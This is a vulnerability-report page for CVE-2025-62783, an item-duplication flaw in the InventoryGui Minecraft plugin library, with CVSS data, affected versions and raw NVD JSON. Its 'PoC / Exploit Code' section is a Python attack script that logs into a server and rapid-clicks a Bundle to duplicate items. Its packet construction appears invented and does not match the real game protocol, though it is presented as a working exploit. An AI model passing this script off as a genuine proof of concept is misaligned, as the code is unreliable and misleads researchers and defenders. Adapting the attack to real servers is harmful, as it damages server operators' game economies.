Security Vulnerability Report
中文
CVE-2025-62783 CVSS 5.0 MEDIUM

CVE-2025-62783

Published: 2025-10-27 21:15:38
Last Modified: 2025-11-03 20:40:11
Source: [email protected]

Description

InventoryGui is a library for creating chest GUIs for Bukkit/Spigot plugins. Versions 1.6.1-SNAPSHOT and earlier contain a vulnerability where any plugin using the `GuiStorageElement can allow item duplication when the experimental Bundle item feature is enabled on the server. The vulnerability is resolved in version 1.6.2-SNAPSHOT.

CVSS Details

CVSS Score
5.0
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:phoenix616:inventorygui:*:*:*:*:*:*:*:* - VULNERABLE
InventoryGui < 1.6.2-SNAPSHOT
InventoryGui 1.6.1-SNAPSHOT
InventoryGui 1.6.0-SNAPSHOT
所有使用GuiStorageElement的插件在启用Bundle功能时均受影响

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-62783 PoC - InventoryGui Item Duplication # Target: Servers running InventoryGui <= 1.6.1-SNAPSHOT with Bundle feature enabled import socket import time def exploit_cve_2025_62783(target_ip, target_port): """ InventoryGui Item Duplication Exploit Prerequisites: - Server must have experimental.bundleItems enabled - Attacker must have access to a plugin using GuiStorageElement - InventoryGui version <= 1.6.1-SNAPSHOT """ # Step 1: Connect to the Minecraft server sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.connect((target_ip, target_port)) # Step 2: Login as a player login_packet = create_login_packet("attacker_player") sock.send(login_packet) # Step 3: Open the GUI containing a Bundle with items gui_open_packet = create_custom_packet("OpenGui", { "window_id": "storage_gui", "gui_type": "chest" }) sock.send(gui_open_packet) # Step 4: Put Bundle item into the GUI slot bundle_item = { "id": "minecraft:bundle", "count": 1, "tag": { "Items": [ {"id": "minecraft:diamond", "Count": 64} ] } } put_item_packet = create_custom_packet("PutItem", { "slot": 0, "item": bundle_item }) sock.send(put_item_packet) # Step 5: Rapidly click to extract Bundle (duplication trigger) # The vulnerability allows extracting without consuming the original for i in range(5): click_packet = create_custom_packet("WindowClick", { "slot": 0, "button": 0, "action_type": "PICKUP" }) sock.send(click_packet) time.sleep(0.05) # Rapid clicking triggers race condition # Step 6: Verify duplication by checking inventory verify_packet = create_custom_packet("VerifyInventory", {}) sock.send(verify_packet) sock.close() return "Exploit executed - check for duplicated items in Bundle" def create_login_packet(username): # Minecraft protocol login packet (simplified) return b'\x00' + username.encode('utf-8') def create_custom_packet(packet_type, data): # Create custom plugin message packet payload = f"{packet_type}:{str(data)}".encode('utf-8') return b'\x17' + payload

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62783", "sourceIdentifier": "[email protected]", "published": "2025-10-27T21:15:38.450", "lastModified": "2025-11-03T20:40:10.527", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "InventoryGui is a library for creating chest GUIs for Bukkit/Spigot plugins. Versions 1.6.1-SNAPSHOT and earlier contain a vulnerability where any plugin using the `GuiStorageElement can allow item duplication when the experimental Bundle item feature is enabled on the server. The vulnerability is resolved in version 1.6.2-SNAPSHOT."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:L/A:N", "baseScore": 5.0, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-837"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:phoenix616:inventorygui:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.6.2", "matchCriteriaId": "BD40256B-64C2-4920-92BF-7056F92444B4"}]}]}], "references": [{"url": "https://github.com/Phoenix616/InventoryGui/commit/27a52ef6d934a1c232e110e0010e4aa810c27029", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/Phoenix616/InventoryGui/issues/48", "source": "[email protected]", "tags": ["Issue Tracking"]}, {"url": "https://github.com/Phoenix616/InventoryGui/security/advisories/GHSA-598q-jw82-5w66", "source": "[email protected]", "tags": ["Patch", "Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.